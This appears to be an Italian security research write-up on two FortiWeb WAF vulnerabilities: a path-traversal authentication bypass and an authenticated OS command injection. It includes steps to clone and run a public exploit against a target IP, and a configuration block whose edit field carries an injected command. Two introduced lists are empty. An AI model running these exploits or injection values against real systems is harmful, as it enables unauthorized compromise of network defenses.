
Ricerca sulla sicurezza su vulnerabilità di Fortinet FortiWeb (CVE-2025-64446, CVE-2025-58034)
Fortinet FortiWeb è un dispositivo Web Application Firewall (WAF) ampiamente implementato nei sistemi aziendali per proteggere le applicazioni web dalle minacce comuni.
Poiché FortiWeb si trova spesso nello strato di protezione centrale, le vulnerabilità relative all'autenticazione o all'esecuzione di comandi del sistema operativo possono avere un impatto grave sull'intera infrastruttura sottostante. Nel 2025, sono state divulgate due vulnerabilità critiche su FortiWeb:
CVE-2025-64446 – Bypass dell'autenticazione tramite Relative Path Traversal
CVE-2025-58034 – OS Command Injection in contesto autenticato
CVE-2025-64446 deriva dal fatto che FortiWeb gestisce e controlla i percorsi di accesso in modo non rigoroso prima di applicare il meccanismo di autenticazione.
Nello specifico:
Questo errore porta al fatto che alcuni endpoint amministrativi possono essere raggiunti senza un'autenticazione valida.
CVE-2025-58034 si verifica perché FortiWeb gestisce in modo non sicuro i dati di input dell'utente durante la chiamata di comandi del sistema operativo.
Le cause principali includono:
Questa vulnerabilità richiede un contesto autenticato, ma comporta comunque un alto livello di rischio poiché è correlata all'esecuzione di comandi.
git clone https://github.com/lincemorado97/CVE-2025-64446_CVE-2025-58034 cd CVE-2025-64446_CVE-2025-58034
L'ambiente virtuale Python (venv) viene utilizzato per creare un ambiente di lavoro indipendente per ciascun progetto, aiutando a separare le librerie dipendenti dal sistema Python principale. Questo evita conflitti di versione delle librerie, garantisce la stabilità dell'ambiente di lavoro e limita l'impatto sul sistema.
python3 -m venv venv source venv/bin/activate
pip install -r requirements.txt
python exploit.py <target_ip>

config user saml-user
edit "<YOUR COMMAND>"
set entityID http://foo
set service-path /foo
set enforce-signing disable
set slo-bind post
set slo-path /foo
set sso-bind post
set sso-path /foo
end
La vulnerabilità CVE-2025-58034 si verifica perché FortiWeb non controlla rigorosamente i dati di input in alcuni campi di configurazione, in particolare il valore passato tramite il comando: edit "" Problema: Questo valore viene trattato come una stringa di configurazione Successivamente viene inserito in comandi interni del sistema operativo Non viene filtrato o soggetto a escape completo dei caratteri speciali Ciò porta alla possibilità che i dati di configurazione possano influenzare direttamente il comando del sistema operativo eseguito, causando una OS Command Injection.